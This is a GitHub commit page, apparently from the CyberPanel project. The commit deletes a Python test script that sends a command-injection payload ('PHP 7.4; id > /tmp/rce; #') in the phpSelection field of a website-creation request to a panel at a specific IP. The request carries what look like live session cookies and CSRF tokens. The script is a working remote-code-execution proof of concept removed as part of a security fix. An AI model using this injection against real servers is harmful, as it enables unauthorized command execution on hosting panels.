Skip to content

Commit 9fbdc60

Browse files
committed
added global session detector for further security
1 parent 793b043 commit 9fbdc60

File tree

1 file changed

+0
-39
lines changed

1 file changed

+0
-39
lines changed

plogical/test.py

Lines changed: 0 additions & 39 deletions
Original file line numberDiff line numberDiff line change
@@ -1,39 +0,0 @@
1-
import requests
2-
3-
url = "https://95.217.125.210:8090/websites/submitWebsiteCreation"
4-
headers = {
5-
"Host": "95.217.125.210:8090",
6-
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0",
7-
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8",
8-
"Accept-Language": "en-US,en;q=0.5",
9-
"Accept-Encoding": "gzip, deflate, br, zstd",
10-
"Referer": "https://95.217.125.210:8090/",
11-
"Connection": "keep-alive",
12-
"Cookie": "csrftoken=yWFDXndgjcsNYj7z8IYozbCQUBj4eLjXsG14u1PQay1lrwohlnqLHG5fwTuRC8I0; smtoken=7c09dd03817bdfebcaf0a97be32628c480663479; django_language=en; SignonSession=422tgvnrnd2f97lem1e2q0l76l; AIOHTTP_SESSION=\"gAAAAABnG8rXm2L1JmWTEqI8BGKHlWUvCQLuvN_VXWu-6r25Rk811sSjtcEK1-kuE-TrQTOwmN2K2xianVlqB3d70QcTeuQwH6a8yRfpi1UMDlysd8W10Xk8h4I_H77EFhZ01d05GImBipmznQIrQ54ZUBWt7ygx8JW52DYaG94Rd9slB3CZqpc=\"; sessionid=tsiqhd7qkcqh393qkdy7oteiagb046sl",
13-
"Upgrade-Insecure-Requests": "1",
14-
"Sec-Fetch-Dest": "document",
15-
"Sec-Fetch-Mode": "navigate",
16-
"Sec-Fetch-Site": "same-origin",
17-
"Sec-Fetch-User": "?1",
18-
"Priority": "u=0, i",
19-
"Pragma": "no-cache",
20-
"Cache-Control": "no-cache"
21-
}
22-
23-
data = {
24-
"package": "Default",
25-
"domainName": "cyberpanel.net",
26-
"ownerEmail": "cyber@gmail.com",
27-
"phpSelection": "PHP 7.4; id > /tmp/rce; #",
28-
"ssl": "on",
29-
"websiteOwner": "admin",
30-
"dkimCheck": "0",
31-
"openBasedir": "on",
32-
"mailDomain": "0",
33-
"apacheBackend": "0"
34-
}
35-
36-
response = requests.options(url, headers=headers, json=data, verify=False)
37-
38-
print(response.status_code)
39-
print(response.text)

0 commit comments

Comments
 (0)